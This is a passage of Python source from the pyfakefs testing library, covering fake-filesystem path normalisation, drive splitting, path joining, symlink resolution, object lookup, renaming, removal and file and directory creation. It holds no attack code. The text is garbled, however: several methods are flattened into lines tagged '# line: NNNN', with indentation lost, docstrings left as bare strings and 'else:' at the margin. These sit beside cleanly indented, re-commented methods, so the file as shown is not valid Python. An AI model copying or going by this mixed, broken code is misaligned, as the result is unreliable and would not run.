        if ((file_des >= len(self.open_files)) or (self.open_files[file_des] is None)):
            raise OSError(errno.EBADF, 'Bad file descriptor', file_des)
        return self.open_files[file_des]
# line: 1182
def HasOpenFile(self, file_object):
# line: 1191
'Return True if the given file object is in the list of open files.\n New in pyfakefs 2.9.\n\n Args:\n file_object: The FakeFile object to be checked.\n\n Returns:\n True if the file is open.\n '
# line: 1192
return (file_object in [wrapper.GetObject() for wrapper in self.open_files if wrapper])
# line: 1194
def NormalizePathSeparator(self, path):
# line: 1204
'Replace all appearances of alternative path separator with path separator.\n Do nothing if no alternative separator is set.\n New in pyfakefs 2.9.\n\n Args:\n path: the path to be normalized.\n\n Returns:\n The normalized path that will be used internally.\n '
# line: 1205
if (sys.version_info >= (3, 6)):
# line: 1206
path = os.fspath(path)
# line: 1207
if ((self.alternative_path_separator is None) or (not path)):
# line: 1208
return path
# line: 1209
return path.replace(self._alternative_path_separator(path), self._path_separator(path))
    def CollapsePath(self, path):
        """Mimic os.path.normpath using the specified path_separator.

        Mimics os.path.normpath using the path_separator that was specified
        for this FakeFilesystem. Normalizes the path, but unlike the method
        NormalizePath, does not make it absolute. Eliminates dot components
        (. and ..) and combines repeated path separators (//). Initial ..
        components are left in place for relative paths. If the result is an
        empty path, '.' is returned instead.

        This also replaces alternative path separator with path separator.
        That is, it behaves like the real os.path.normpath on Windows if
        initialized with '\\' as path separator and '/' as alternative
        separator.

        Args:
          path: (str) The path to normalize.

        Returns:
          (str) A copy of path with empty components and dot components removed.
        """
        path = self.NormalizePathSeparator(path)
        (drive, path) = self.SplitDrive(path)
        sep = self._path_separator(path)
        is_absolute_path = path.startswith(sep)
        path_components = path.split(sep)
        collapsed_path_components = []
        # Match the literal markers in the same string type as path.
        dot = self._matching_string(path, '.')
        dotdot = self._matching_string(path, '..')
        for component in path_components:
            if ((not component) or (component == dot)):
                # Skip empty components (from '//') and '.' components.
                continue
            if (component == dotdot):
                if (collapsed_path_components and (collapsed_path_components[(-1)] != dotdot)):
                    # '..' cancels the preceding real component.
                    collapsed_path_components.pop()
                    continue
                elif is_absolute_path:
                    # '..' at the root is a no-op; leading '..' is kept for
                    # relative paths by falling through to the append below.
                    continue
            collapsed_path_components.append(component)
        collapsed_path = sep.join(collapsed_path_components)
        if is_absolute_path:
            collapsed_path = (sep + collapsed_path)
        return ((drive + collapsed_path) or dot)
    def NormalizeCase(self, path):
        """Return a normalized case version of the given path for case-insensitive
        file systems. For case-sensitive file systems, return path unchanged.
        New in pyfakefs 2.9.

        Args:
          path: the file path to be transformed.

        Returns:
          A version of path matching the case of existing path elements.
        """
        def components_to_path():
            # Re-join the case-corrected components; components that could
            # not be resolved are appended unchanged.
            if (len(path_components) > len(normalized_components)):
                normalized_components.extend(path_components[len(normalized_components):])
            sep = self._path_separator(path)
            normalized_path = sep.join(normalized_components)
            # Restore a leading separator lost by the join.
            if (path.startswith(sep) and (not normalized_path.startswith(sep))):
                normalized_path = (sep + normalized_path)
            return normalized_path

        if (self.is_case_sensitive or (not path)):
            return path
        path_components = self.GetPathComponents(path)
        normalized_components = []
        current_dir = self.root
        for component in path_components:
            if (not isinstance(current_dir, FakeDirectory)):
                # Cannot descend further; emit what was resolved so far.
                return components_to_path()
            (dir_name, current_dir) = self._DirectoryContent(current_dir, component)
            if ((current_dir is None) or (isinstance(current_dir, FakeDirectory) and (current_dir._byte_contents is None) and (current_dir.st_size == 0))):
                return components_to_path()
            normalized_components.append(dir_name)
        return components_to_path()
# line: 1294
def NormalizePath(self, path):
    """Absolutize and minimalize the given path.

    Forces all relative paths to be absolute, and normalizes the path to
    eliminate dot and empty components.

    Args:
        path: path to normalize

    Returns:
        The normalized path relative to the current working directory,
        or the root directory if path is empty.
    """
    path = self.NormalizePathSeparator(path)
    if not path:
        # An empty path maps to the root directory.
        path = self.path_separator
    elif not self._StartsWithRootPath(path):
        # Relative path: prefix it with the current working directory,
        # unless cwd is the root itself (which would duplicate the root name).
        root_name = self._matching_string(path, self.root.name)
        empty = self._matching_string(path, '')
        prefix = (self.cwd != root_name and self.cwd) or empty
        path = self._path_separator(path).join((prefix, path))
    if path == self._matching_string(path, '.'):
        path = self.cwd
    return self.CollapsePath(path)
# line: 1320
def SplitPath(self, path):
    """Mimic os.path.split using the specified path_separator.

    Mimics os.path.split using the path_separator that was specified
    for this FakeFilesystem.

    Args:
        path: (str) The path to split.

    Returns:
        (str) A duple (pathname, basename) for which pathname does not
        end with a slash, and basename does not contain a slash.
    """
    (drive, path) = self.SplitDrive(path)
    path = self.NormalizePathSeparator(path)
    sep = self._path_separator(path)
    parts = path.split(sep)
    if not parts:
        return ('', '')
    basename = parts.pop()
    if not parts:
        # No directory part present at all.
        return ('', basename)
    if any(parts):
        # Strip empty trailing components caused by repeated separators
        # directly before the basename.
        while not parts[-1]:
            parts.pop()
        return (drive + sep.join(parts), basename)
    # Only empty components remain: the dirname is the root (or the drive).
    return (drive or sep, basename)
# line: 1352
def SplitDrive(self, path):
    """Splits the path into the drive part and the rest of the path.
    New in pyfakefs 2.9.

    Taken from Windows specific implementation in Python 3.5 and slightly
    adapted.

    Args:
        path: the full path to be split.

    Returns:
        A tuple of the drive part and the rest of the path, or of an empty
        string and the full path if drive letters are not supported or no
        drive is present.
    """
    if (sys.version_info >= (3, 6)):
        # Accept path-like objects (os.PathLike) under Python 3.6+.
        path = os.fspath(path)
    if self.is_windows_fs:
        if (len(path) >= 2):
            path = self.NormalizePathSeparator(path)
            sep = self._path_separator(path)
            # UNC path handling was added to splitdrive in Python 2.7.8.
            if (sys.version_info >= (2, 7, 8)):
                if ((path[0:2] == (sep * 2)) and (path[2:3] != sep)):
                    # UNC path of the form \\machine\mountpoint\rest:
                    # the drive part is \\machine\mountpoint.
                    sep_index = path.find(sep, 2)
                    if (sep_index == (-1)):
                        # No mount point separator - not a valid UNC drive.
                        return (path[:0], path)
                    sep_index2 = path.find(sep, (sep_index + 1))
                    if (sep_index2 == (sep_index + 1)):
                        # A separator right after the machine name means an
                        # empty mount point - not a valid UNC drive.
                        return (path[:0], path)
                    if (sep_index2 == (-1)):
                        sep_index2 = len(path)
                    return (path[:sep_index2], path[sep_index2:])
            if (path[1:2] == self._matching_string(path, ':')):
                # Classic drive letter, e.g. 'C:'.
                return (path[:2], path[2:])
    # No drive support or no drive present.
    return (path[:0], path)
# line: 1388
def _JoinPathsWithDriveSupport(self, *all_paths):
    """Taken from Python 3.5 os.path.join() code in ntpath.py and slightly
    adapted to honor this filesystem's separators and case sensitivity."""
    base_path = all_paths[0]
    paths_to_add = all_paths[1:]
    sep = self._path_separator(base_path)
    seps = [sep, self._alternative_path_separator(base_path)]
    (result_drive, result_path) = self.SplitDrive(base_path)
    for path in paths_to_add:
        (drive_part, path_part) = self.SplitDrive(path)
        if (path_part and (path_part[:1] in seps)):
            # Second path is absolute: it replaces what was joined so far,
            # keeping the previous drive if the new path carries none.
            if (drive_part or (not result_drive)):
                result_drive = drive_part
            result_path = path_part
            continue
        elif (drive_part and (drive_part != result_drive)):
            if (self.is_case_sensitive or (drive_part.lower() != result_drive.lower())):
                # Different drives: discard everything joined so far.
                result_drive = drive_part
                result_path = path_part
                continue
            # Same drive in a different case: adopt the new spelling.
            result_drive = drive_part
        # Second path is relative to the first: append with a separator.
        if (result_path and (result_path[(-1):] not in seps)):
            result_path = (result_path + sep)
        result_path = (result_path + path_part)
    # Add a separator between a non-absolute drive (e.g. 'C:') and the path,
    # to avoid emitting a drive-relative path.
    colon = self._matching_string(base_path, ':')
    if (result_path and (result_path[:1] not in seps) and result_drive and (result_drive[(-1):] != colon)):
        return ((result_drive + sep) + result_path)
    return (result_drive + result_path)
# line: 1422
def JoinPaths(self, *paths):
    """Mimic os.path.join using the specified path_separator.

    Args:
        *paths: (str) Zero or more paths to join.

    Returns:
        (str) The paths joined by the path separator, starting with the last
        absolute path in paths.
    """
    if sys.version_info >= (3, 6):
        paths = [os.fspath(path) for path in paths]
    if len(paths) == 1:
        return paths[0]
    if self.is_windows_fs:
        # Windows semantics require drive letter handling.
        return self._JoinPathsWithDriveSupport(*paths)
    sep = self._path_separator(paths[0])
    segments = []
    for segment in paths:
        if self._StartsWithRootPath(segment):
            # An absolute segment discards everything collected so far.
            segments = [segment]
            continue
        if segments and not segments[-1].endswith(sep):
            segments.append(sep)
        if segment:
            segments.append(segment)
    return self._matching_string(paths[0], '').join(segments)
# line: 1452
def GetPathComponents(self, path):
    """Breaks the path into a list of component names.

    Does not include the root directory as a component, as all paths
    are considered relative to the root directory for the FakeFilesystem.
    Callers should basically follow this pattern:

    >>> file_path = self.NormalizePath(file_path)
    >>> path_components = self.GetPathComponents(file_path)
    >>> current_dir = self.root
    >>> for component in path_components:
    >>>     if component not in current_dir.contents:
    >>>         raise IOError
    >>>     DoStuffWithComponent(current_dir, component)
    >>>     current_dir = current_dir.GetEntry(component)

    Args:
        path: path to tokenize

    Returns:
        The list of names split from path
    """
    if not path or path == self._path_separator(path):
        return []
    (drive, path) = self.SplitDrive(path)
    components = path.split(self._path_separator(path))
    assert drive or components
    if not components[0]:
        # Absolute path: drop the empty component in front of the
        # leading separator.
        components = components[1:]
    if drive:
        # The drive counts as the first component.
        components.insert(0, drive)
    return components
# line: 1486
def StartsWithDriveLetter(self, file_path):
    """Return True if file_path starts with a drive letter.
    New in pyfakefs 2.9.

    Args:
        file_path: the full path to be examined.

    Returns:
        True if drive letter support is enabled in the filesystem and
        the path starts with a drive letter.
    """
    colon = self._matching_string(file_path, ':')
    # Bug fix: the original referenced `isalpha` without calling it; a bound
    # method is always truthy, so any first character passed the alphabetic
    # check (e.g. '::' was treated as starting with a drive letter).
    return (self.is_windows_fs and (len(file_path) >= 2) and
            file_path[:1].isalpha() and (file_path[1:2] == colon))
# line: 1501
def _StartsWithRootPath(self, file_path):
# line: 1502
root_name = self._matching_string(file_path, self.root.name)
# line: 1503
return (file_path.startswith(root_name) or ((not self.is_case_sensitive) and file_path.lower().startswith(root_name.lower())) or self.StartsWithDriveLetter(file_path))
# line: 1508
def _IsRootPath(self, file_path):
# line: 1509
root_name = self._matching_string(file_path, self.root.name)
# line: 1510
return ((file_path == root_name) or ((not self.is_case_sensitive) and (file_path.lower() == root_name.lower())) or ((len(file_path) == 2) and self.StartsWithDriveLetter(file_path)))
# line: 1514
def _EndsWithPathSeparator(self, file_path):
# line: 1515
return (file_path and (file_path.endswith(self._path_separator(file_path)) or ((self.alternative_path_separator is not None) and file_path.endswith(self._alternative_path_separator(file_path)))))
# line: 1519
def _DirectoryContent(self, directory, component):
    """Look up `component` inside `directory`, case-insensitively if the
    filesystem is configured that way.

    Returns:
        A (name, entry) tuple for the matching entry, or (None, None) if
        `directory` is not a FakeDirectory or holds no matching entry.
    """
    if not isinstance(directory, FakeDirectory):
        return (None, None)
    if component in directory.contents:
        # Exact (case-sensitive) hit.
        return (component, directory.contents[component])
    if not self.is_case_sensitive:
        # Fall back to a case-insensitive scan; first match wins.
        for name in directory.contents:
            if name.lower() == component.lower():
                return (name, directory.contents[name])
    return (None, None)
# line: 1533
def Exists(self, file_path):
    """Return true if a path points to an existing file system object.

    Args:
        file_path: path to examine.

    Returns:
        (bool) True if the corresponding object exists.

    Raises:
        TypeError: if file_path is None.
    """
    if sys.version_info >= (3, 6):
        file_path = os.fspath(file_path)
    if file_path is None:
        raise TypeError
    if not file_path:
        return False
    try:
        resolved = self.ResolvePath(file_path)
    except (IOError, OSError):
        # Broken links or missing intermediate directories.
        return False
    if resolved == self.root.name:
        return True
    # Walk the resolved components from the root.
    current = self.root
    for component in self.GetPathComponents(resolved):
        current = self._DirectoryContent(current, component)[1]
        if not current:
            return False
    return True
# line: 1565
def ResolvePath(self, file_path, allow_fd=False, raw_io=True):
    """Follow a path, resolving symlinks.

    ResolvePath traverses the filesystem along the specified file path,
    resolving file names and symbolic links until all elements of the path
    are exhausted, or we reach a file which does not exist.  If all the
    elements are not consumed, they just get appended to the path resolved
    so far.  This gives us the path which is as resolved as it can be, even
    if the file does not exist.

    This behavior mimics Unix semantics, and is best shown by example.
    Given a file system that looks like this:

          /a/b/
          /a/b/c -> /a/b2          c is a symlink to /a/b2
          /a/b2/x
          /a/c -> ../d
          /a/x -> y

    Then:
          /a/b/x      =>  /a/b/x
          /a/c        =>  /a/d
          /a/x        =>  /a/y
          /a/b/c/d/e  =>  /a/b2/d/e

    Args:
        file_path: path to examine.
        allow_fd: If `True`, `file_path` may be an open file descriptor.
        raw_io: `True` if called from low-level I/O functions.

    Returns:
        resolved_path (string) or None.

    Raises:
        TypeError: if file_path is None.
        IOError: if file_path is '' or a part of the path doesn't exist.
    """

    def _ComponentsToPath(component_folders):
        # Join resolved components back into an absolute path string.
        sep = (self._path_separator(component_folders[0]) if component_folders else self.path_separator)
        path = sep.join(component_folders)
        if (not self._StartsWithRootPath(path)):
            path = (sep + path)
        return path

    def _ValidRelativePath(file_path):
        # Every ancestor reached via a '/..' hop must exist for the path
        # to be considered valid.
        slash_dotdot = self._matching_string(file_path, '/..')
        while (file_path and (slash_dotdot in file_path)):
            file_path = file_path[:file_path.rfind(slash_dotdot)]
            if (not self.Exists(self.NormalizePath(file_path))):
                return False
        return True

    def _FollowLink(link_path_components, link):
        """Follow a link w.r.t. a path resolved so far.

        The component is either a real file, which is a no-op, or a symlink.
        In the case of a symlink, we have to modify the path as built up so
        far:
          /a/b => ../c   should yield /a/../c (which will normalize to /a/c)
          /a/b => x      should yield /a/x
          /a/b => /x/y/z should yield /x/y/z
        The modified path may land us in a new spot which is itself a link,
        so we may repeat the process.

        Args:
            link_path_components: The resolved path built up to the link
                so far.
            link: The link object itself.

        Returns:
            (string) the updated path resolved after following the link.

        Raises:
            IOError: if there are too many levels of symbolic link.
        """
        link_path = link.contents
        sep = self._path_separator(link_path)
        alt_sep = self._alternative_path_separator(link_path)
        # A relative link target replaces only the last resolved component;
        # an absolute target replaces the whole path.
        if ((not link_path.startswith(sep)) and ((alt_sep is None) or (not link_path.startswith(alt_sep)))):
            components = link_path_components[:(-1)]
            components.append(link_path)
            link_path = sep.join(components)
        return self.CollapsePath(link_path)

    if (allow_fd and (sys.version_info >= (3, 3)) and isinstance(file_path, int)):
        # A file descriptor was passed; resolve to the open file's path.
        return self.GetOpenFile(file_path).GetObject().GetPath()
    if (sys.version_info >= (3, 6)):
        file_path = os.fspath(file_path)
    if (file_path is None):
        raise TypeError('Expected file system path string, received None')
    if ((not file_path) or (not _ValidRelativePath(file_path))):
        # A relative path with a nonexistent ancestor ('..' hop) is treated
        # like a path that doesn't exist.
        raise IOError(errno.ENOENT, ("No such file or directory: '%s'" % file_path))
    file_path = self.NormalizePath(self.NormalizeCase(file_path))
    if self._IsRootPath(file_path):
        return file_path
    current_dir = self.root
    path_components = self.GetPathComponents(file_path)
    resolved_components = []
    link_depth = 0
    while path_components:
        component = path_components.pop(0)
        resolved_components.append(component)
        current_dir = self._DirectoryContent(current_dir, component)[1]
        if (current_dir is None):
            # The component does not exist; append the rest unresolved.
            resolved_components.extend(path_components)
            break
        if stat.S_ISLNK(current_dir.st_mode):
            # Guard against symlink loops.
            if (link_depth > _MAX_LINK_DEPTH):
                error_class = (OSError if raw_io else IOError)
                raise error_class(errno.ELOOP, ("Too many levels of symbolic links: '%s'" % _ComponentsToPath(resolved_components)))
            link_path = _FollowLink(resolved_components, current_dir)
            # Restart resolution from the root with the link target
            # prepended to the not-yet-processed components.
            target_components = self.GetPathComponents(link_path)
            path_components = (target_components + path_components)
            resolved_components = []
            current_dir = self.root
            link_depth += 1
    return _ComponentsToPath(resolved_components)
# line: 1715
def GetObjectFromNormalizedPath(self, file_path):
    """Search for the specified filesystem object within the fake filesystem.

    Args:
        file_path: specifies target FakeFile object to retrieve, with a
            path that has already been normalized/resolved.

    Returns:
        the FakeFile object corresponding to file_path.

    Raises:
        IOError: if the object is not found.
    """
    if (sys.version_info >= (3, 6)):
        file_path = os.fspath(file_path)
    if (file_path == self.root.name):
        return self.root
    path_components = self.GetPathComponents(file_path)
    target_object = self.root
    try:
        for component in path_components:
            if stat.S_ISLNK(target_object.st_mode):
                # Resolve an intermediate symlink before descending into it.
                target_object = self.ResolveObject(target_object.contents)
            if (not stat.S_ISDIR(target_object.st_mode)):
                # A non-directory in the middle of the path: POSIX reports
                # ENOTDIR, Windows reports ENOENT.
                if (not self.is_windows_fs):
                    raise IOError(errno.ENOTDIR, 'Not a directory in fake filesystem', file_path)
                raise IOError(errno.ENOENT, 'No such file or directory in fake filesystem', file_path)
            target_object = target_object.GetEntry(component)
    except KeyError:
        raise IOError(errno.ENOENT, 'No such file or directory in fake filesystem', file_path)
    return target_object
# line: 1753
def GetObject(self, file_path):
    """Search for the specified filesystem object within the fake filesystem.

    Args:
        file_path: specifies target FakeFile object to retrieve.

    Returns:
        the FakeFile object corresponding to file_path.

    Raises:
        IOError: if the object is not found.
    """
    if sys.version_info >= (3, 6):
        file_path = os.fspath(file_path)
    # Normalize case and path before delegating the actual lookup.
    normalized = self.NormalizePath(self.NormalizeCase(file_path))
    return self.GetObjectFromNormalizedPath(normalized)
# line: 1770
def ResolveObject(self, file_path, follow_symlinks=True, allow_fd=False):
    """Search for the specified filesystem object, resolving all links.

    Args:
        file_path: Specifies target FakeFile object to retrieve.
        follow_symlinks: If `False`, the link itself is resolved,
            otherwise the object linked to.
        allow_fd: If `True`, `file_path` may be an open file descriptor.

    Returns:
        the FakeFile object corresponding to file_path.

    Raises:
        IOError: if the object is not found.
    """
    if allow_fd and sys.version_info >= (3, 3) and isinstance(file_path, int):
        # An open file descriptor: return its underlying object directly.
        return self.GetOpenFile(file_path).GetObject()
    if not follow_symlinks:
        # lstat-like behavior: resolve only the parent links.
        return self.LResolveObject(file_path)
    if sys.version_info >= (3, 6):
        file_path = os.fspath(file_path)
    return self.GetObjectFromNormalizedPath(self.ResolvePath(file_path))
# line: 1794
def LResolveObject(self, path):
    """Search for the specified object, resolving only parent links.

    This is analogous to the stat/lstat difference.  This resolves links
    *to* the object but not of the final object itself.

    Args:
        path: specifies target FakeFile object to retrieve.

    Returns:
        the FakeFile object corresponding to path.

    Raises:
        IOError: if the object is not found.
    """
    if (sys.version_info >= (3, 6)):
        path = os.fspath(path)
    if (path == self.root.name):
        # The root object is its own parent.
        return self.root
    # Remove trailing separator so the basename can be split off cleanly.
    sep = self._path_separator(path)
    alt_sep = self._alternative_path_separator(path)
    if (path.endswith(sep) or (alt_sep and path.endswith(alt_sep))):
        path = path[:(-1)]
    (parent_directory, child_name) = self.SplitPath(path)
    if (not parent_directory):
        # A bare name is relative to the current working directory.
        parent_directory = self.cwd
    try:
        parent_obj = self.ResolveObject(parent_directory)
        assert parent_obj
        if (not isinstance(parent_obj, FakeDirectory)):
            # POSIX distinguishes a file parent (ENOTDIR) from a missing
            # one (ENOENT); Windows reports ENOENT in both cases.
            if ((not self.is_windows_fs) and isinstance(parent_obj, FakeFile)):
                raise IOError(errno.ENOTDIR, 'The parent object is not a directory', path)
            raise IOError(errno.ENOENT, 'No such file or directory in fake filesystem', path)
        return parent_obj.GetEntry(child_name)
    except KeyError:
        raise IOError(errno.ENOENT, 'No such file or directory in the fake filesystem', path)
# line: 1840
def AddObject(self, file_path, file_object, error_class=OSError):
    """Add a fake file or directory into the filesystem at file_path.

    Args:
        file_path: the path to the file to be added relative to self.
        file_object: file or directory to add.
        error_class: the error class to be thrown if file_path does
            not correspond to a directory (used internally).

    Raises:
        IOError or OSError: if file_path does not correspond to a directory.
    """
    if file_path:
        target_directory = self.ResolveObject(file_path)
        if not stat.S_ISDIR(target_directory.st_mode):
            raise error_class(errno.ENOTDIR, 'Not a directory in the fake filesystem', file_path)
    else:
        # An empty path adds the object directly under the root.
        target_directory = self.root
    target_directory.AddEntry(file_object)
# line: 1862
def RenameObject(self, old_file_path, new_file_path, force_replace=False):
    """Renames a FakeFile object at old_file_path to new_file_path,
    preserving all properties.

    Args:
        old_file_path: Path to filesystem object to rename.
        new_file_path: Path to where the filesystem object will live after
            this call.
        force_replace: If set and destination is an existing file, it will
            be replaced even under Windows if the user has permissions,
            otherwise replacement happens under Unix only.

    Raises:
        OSError: if old_file_path does not exist.
        OSError: if new_file_path is an existing directory
            (Windows, or Posix if old_file_path points to a regular file)
        OSError: if old_file_path is a directory and new_file_path a file
        OSError: if new_file_path is an existing file and force_replace
            not set (Windows only).
        OSError: if new_file_path is an existing file and could not be
            removed (Posix, or Windows with force_replace set).
        OSError: if dirname(new_file_path) does not exist.
        OSError: if the file would be moved to another filesystem
            (e.g. mount point).
    """
    old_file_path = self.NormalizePath(old_file_path)
    new_file_path = self.NormalizePath(new_file_path)
    if ((not self.Exists(old_file_path)) and (not self.IsLink(old_file_path))):
        raise OSError(errno.ENOENT, 'Fake filesystem object: can not rename nonexistent file', old_file_path)
    old_object = self.LResolveObject(old_file_path)
    if (not self.is_windows_fs):
        # POSIX forbids renaming a directory onto a symlink and vice versa.
        if (self.IsDir(old_file_path, follow_symlinks=False) and self.IsLink(new_file_path)):
            raise OSError(errno.ENOTDIR, 'Cannot rename directory to symlink', new_file_path)
        if (self.IsDir(new_file_path, follow_symlinks=False) and self.IsLink(old_file_path)):
            raise OSError(errno.EISDIR, 'Cannot rename symlink to directory', new_file_path)
    if (self.Exists(new_file_path) or self.IsLink(new_file_path)):
        if (old_file_path == new_file_path):
            # Renaming to the same path is a no-op.
            return
        new_object = self.GetObject(new_file_path)
        if (old_object == new_object):
            if (old_file_path.lower() == new_file_path.lower()):
                # Only the case differs - the rename below adjusts it.
                pass
            else:
                # Hard links to the same file object - nothing to do.
                return
        elif (stat.S_ISDIR(new_object.st_mode) or stat.S_ISLNK(new_object.st_mode)):
            # Target exists and is a directory or a link.
            if self.is_windows_fs:
                if force_replace:
                    raise OSError(errno.EACCES, 'Fake filesystem object: can not replace existing directory', new_file_path)
                else:
                    raise OSError(errno.EEXIST, 'Fake filesystem object: can not rename to existing directory', new_file_path)
            if (not stat.S_ISLNK(new_object.st_mode)):
                if new_object.contents:
                    raise OSError(errno.EEXIST, 'Fake filesystem object: can not rename to non-empty directory', new_file_path)
                if stat.S_ISREG(old_object.st_mode):
                    raise OSError(errno.EISDIR, 'Fake filesystem object: cannot rename file to directory', new_file_path)
        elif stat.S_ISDIR(old_object.st_mode):
            raise OSError(errno.ENOTDIR, 'Fake filesystem object: cannot rename directory to file', new_file_path)
        elif (self.is_windows_fs and (not force_replace)):
            raise OSError(errno.EEXIST, 'Fake filesystem object: can not rename to existing file', new_file_path)
        else:
            # Replace the existing target (POSIX default, or Windows with
            # force_replace set).
            try:
                self.RemoveObject(new_file_path)
            except IOError as exc:
                raise OSError(exc.errno, exc.strerror, exc.filename)
    (old_dir, old_name) = self.SplitPath(old_file_path)
    (new_dir, new_name) = self.SplitPath(new_file_path)
    if (not self.Exists(new_dir)):
        raise OSError(errno.ENOENT, 'No such fake directory', new_dir)
    old_dir_object = self.ResolveObject(old_dir)
    new_dir_object = self.ResolveObject(new_dir)
    if (old_dir_object.st_dev != new_dir_object.st_dev):
        raise OSError(errno.EXDEV, 'Fake filesystem object: cannot rename across file systems', old_file_path)
    if (not stat.S_ISDIR(new_dir_object.st_mode)):
        raise OSError((errno.EACCES if self.is_windows_fs else errno.ENOTDIR), 'Fake filesystem object: target parent is not a directory', new_file_path)
    if new_dir_object.HasParentObject(old_object):
        # Cannot move a directory into one of its own subdirectories.
        raise OSError(errno.EINVAL, 'Fake filesystem object: invalid target for rename', new_file_path)
    # Perform the actual move: detach under the old name, re-attach under
    # the new one, replacing any leftover entry (e.g. a removed link).
    object_to_rename = old_dir_object.GetEntry(old_name)
    old_dir_object.RemoveEntry(old_name, recursive=False)
    object_to_rename.name = new_name
    if (new_name in new_dir_object.contents):
        new_dir_object.RemoveEntry(new_name)
    new_dir_object.AddEntry(object_to_rename)
# line: 1977
def RemoveObject(self, file_path):
    """Remove an existing file or directory.

    Args:
        file_path: the path to the file relative to self.

    Raises:
        IOError: if file_path does not correspond to an existing file, or
            if part of the path refers to something other than a directory.
        OSError: if the directory is in use (eg, if it is '/').
    """
    file_path = self.NormalizePath(self.NormalizeCase(file_path))
    if self._IsRootPath(file_path):
        # The root (or a drive root) can never be removed.
        raise OSError(errno.EBUSY, 'Fake device or resource busy', file_path)
    try:
        (parent_path, entry_name) = self.SplitPath(file_path)
        parent_obj = self.ResolveObject(parent_path)
        parent_obj.RemoveEntry(entry_name)
    except KeyError:
        raise IOError(errno.ENOENT, 'No such file or directory in the fake filesystem', file_path)
    except AttributeError:
        raise IOError(errno.ENOTDIR, 'Not a directory in the fake filesystem', file_path)
# line: 2005
def CreateDirectory(self, directory_path, perm_bits=PERM_DEF):
    """Create directory_path, and all the parent directories.

    Helper method to set up your test faster.

    Args:
        directory_path: The full directory path to create.
        perm_bits: The permission bits as set by `chmod`.

    Returns:
        the newly created FakeDirectory object.

    Raises:
        OSError: if the directory already exists.
    """
    directory_path = self.NormalizePath(directory_path)
    self._AutoMountDriveIfNeeded(directory_path)
    if self.Exists(directory_path):
        raise OSError(errno.EEXIST, 'Directory exists in fake filesystem', directory_path)
    path_components = self.GetPathComponents(directory_path)
    current_dir = self.root
    # Collect the directories created here so the requested permissions
    # are applied only to new ones, not to pre-existing parents.
    new_dirs = []
    for component in path_components:
        directory = self._DirectoryContent(current_dir, component)[1]
        if (not directory):
            new_dir = FakeDirectory(component, filesystem=self)
            new_dirs.append(new_dir)
            current_dir.AddEntry(new_dir)
            current_dir = new_dir
        else:
            if stat.S_ISLNK(directory.st_mode):
                # Follow symlinked intermediate directories.
                directory = self.ResolveObject(directory.contents)
            current_dir = directory
            if ((directory.st_mode & stat.S_IFDIR) != stat.S_IFDIR):
                raise OSError(errno.ENOTDIR, 'Not a directory', current_dir.GetPath())
    # Set the permission after creating the directories, to allow owner-only
    # modes and the like on the intermediate directories.
    for new_dir in new_dirs:
        new_dir.st_mode = (stat.S_IFDIR | perm_bits)
    self._last_ino += 1
    current_dir.SetIno(self._last_ino)
    return current_dir
# line: 2053
def CreateFile(self, file_path, st_mode=(stat.S_IFREG | PERM_DEF_FILE), contents='', st_size=None, create_missing_dirs=True, apply_umask=False, encoding=None, errors=None):
    """Create file_path, including all the parent directories along the way.

    This helper method can be used to set up tests more easily.

    Args:
        file_path: The path to the file to create.
        st_mode: The stat constant representing the file type.
        contents: The contents of the file.
        st_size: The file size; only valid if contents not given.
        create_missing_dirs: If `True`, auto create missing directories.
        apply_umask: `True` if the current umask must be applied on st_mode.
        encoding: If contents is a unicode string, the encoding used
            for serialization.
            New in pyfakefs 2.9.
        errors: The error mode used for encoding/decoding errors.
            New in pyfakefs 3.2.

    Returns:
        the newly created FakeFile object.

    Raises:
        IOError: if the file already exists.
        IOError: if the containing directory is required and missing.
    """
    # Thin wrapper: the internal helper also serves add_real_file().
    return self.CreateFileInternally(file_path, st_mode, contents, st_size, create_missing_dirs, apply_umask, encoding, errors)
# line: 2084
def add_real_file(self, file_path, read_only=True):
    """Create file_path, including all the parent directories along the way,
    for an existing real file. The contents of the real file are read only
    on demand.
    New in pyfakefs 3.2.

    Args:
        file_path: Path to an existing file in the real file system.
        read_only: If `True` (the default), writing to the fake file
            raises an exception.  Otherwise, writing to the file changes
            the fake file only.

    Returns:
        the newly created FakeFile object.

    Raises:
        OSError: if the file does not exist in the real file system.
        IOError: if the file already exists in the fake file system.

    .. note:: On MacOS and BSD, accessing the fake file's contents will
        update both the real and fake files' `atime` (access time).  In this
        particular case, `add_real_file()` violates the rule that `pyfakefs`
        must not modify the real file system.  Further, Windows offers the
        option to enable atime, and older versions of Linux may also modify
        atime.
    """
    return self.CreateFileInternally(file_path, read_from_real_fs=True, read_only=read_only)
# line: 2114
def add_real_directory(self, dir_path, read_only=True, lazy_read=True):
# line: 2139
'Create a fake directory corresponding to the real directory at the specified\n path. Add entries in the fake directory corresponding to the entries in the\n real directory.\n New in pyfakefs 3.2.\n\n Args:\n dir_path: The path to the existing directory.\n read_only: If set, all files under the directory are treated as\n read-only, e.g. a write access raises an exception;\n otherwise, writing to the files changes the fake files only\n as usually.\n lazy_read: If set (default), directory contents are only read when\n accessed, and only until the needed subdirectory level.\n *Note:* this means that the file system size is only updated\n at the time the directory contents are read; set this to\n `False` only if you are dependent on accurate file system\n size in your test\n\n Returns:\n the newly created FakeDirectory object.\n\n Raises:\n OSError: if the directory does not exist in the real file system.\n IOError: if the directory already exists in the fake file system.\n '
# line: 2140
if (not os.path.exists(dir_path)):
# line: 2141
raise IOError(errno.ENOENT, 'No such directory', dir_path)
# line: 2142
if lazy_read:
# line: 2143
parent_path = os.path.split(dir_path)[0]
# line: 2144
if self.Exists(parent_path):
# line: 2145
parent_dir = self.GetObject(parent_path)
else:
# line: 2147
parent_dir = self.CreateDirectory(parent_path)
# line: 2148
new_dir = FakeDirectoryFromRealDirectory(dir_path, filesystem=self, read_only=read_only)
# line: 2149
parent_dir.AddEntry(new_dir)
# line: 2150
self._last_ino += 1
# line: 2151
new_dir.SetIno(self._last_ino)
else:
# line: 2153
new_dir = self.CreateDirectory(dir_path)
# line: 2154
for (base, _, files) in os.walk(dir_path):
# line: 2155
for fileEntry in files:
# line: 2156
self.add_real_file(os.path.join(base, fileEntry), read_only)
# line: 2157
return new_dir
# line: 2159
def add_real_paths(self, path_list, read_only=True, lazy_dir_read=True):
# line: 2176
